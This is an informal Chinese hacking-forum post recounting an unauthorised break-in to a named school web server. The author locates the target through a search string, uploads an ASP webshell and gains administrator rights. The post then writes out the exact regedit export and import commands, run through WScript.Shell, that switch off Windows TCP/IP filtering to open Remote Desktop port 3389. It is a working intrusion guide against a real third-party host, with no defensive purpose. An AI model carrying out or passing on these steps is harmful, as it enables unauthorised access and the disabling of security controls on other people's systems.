夺鸡提权得到3389权限
www.schoolhacker.com
天下 89711911

夺鸡提权得到3389权限
今天真是好运气 哈哈

今天在前辈的机器上看到黑基  随爱飞翔 在2004年作的那个用 海洋顶端利用程序
夺后门的动画  偶手痒就试了一下  本以为已经没有这种鸡了 哈哈
结果老天却给了我一良鸡哈哈
还让我尝到了直接用asp木马提权的乐趣 （这可是n多人都没有尝倒过di ……——……）
好看操作

打开程序  到百度搜索  "allen的电脑"
就是这个http://www.yp.edu.sh.cn/school/zx/ascjzx/inde.asp
哈哈
传大马

本地组会员             *Administrators       *Users     
哈哈
已经是管理员拉
看看  3389开了没有
开了 哈哈
等  哈 

汗 
可能是对tcp/ip做了限制
好我们来突破他
突破TCP/IP筛选我们可以更改他的注册表来实现，我们要做的就是导出他注册表的三处，更改后再导入就可以了，回到〖Ws cript.Shell〗执行cmd命令：
D:\test.exe "regedit -e D:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip" #导出注册表里关于TCP/IP筛选的第一处
D:\test.exe "regedit -e D:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip" #导出注册表里关于TCP/IP筛选的第二处
D:\test.exe "regedit -e D:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" #导出注册表里关于TCP/IP筛选的第三处
然后回到〖Stream〗或〖FSO〗发现1.reg,2.reg,3.reg已经安静的躺在那里了，嘿嘿~
把1.reg,2.reg,3.reg下载回来到自己的硬盘里面编辑一下，把关于TCP/IP筛选的几个地方改一下，首先打开1.reg找到"EnableSecurityFilters"=dword:00000001把最后面的数字1改成0后保存，然后更改2.reg,3.reg，更改方法一样，我就不再罗嗦了~
然后我们把1.reg,2.reg,3.reg再上传回对方的机器里面（这里我们要选上覆盖模式，因为没有权限删除原来的1.reg,2.reg,3.reg），上传成功后再回到〖Ws cript.Shell〗执行cmd命令：
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -s D:\a004\tggtwe\****.com\UploadSoft\1.reg" #安静模式下把我们修改完的1.reg导入到他的注册表
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -s D:\a004\tggtwe\****.com\UploadSoft\2.reg" #安静模式下把我们修改完的2.reg导入到他的注册表
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -s D:\a004\tggtwe\****.com\UploadSoft\3.reg" #安静模式下把我们修改完的3.reg导入到他的注册表

哈哈
盗用  ！！
因为已经下过了就不在下了
另外 2  3 。reg 我都改好了哈
先在上传上去
好 现在到入

好 我们现在来连接 3389
晕

怎么回那？？
ws criptShell 试试
好慢啊
由于时间关系  就到这了 哈

www.schoolhacker.com
天下 89711911

3166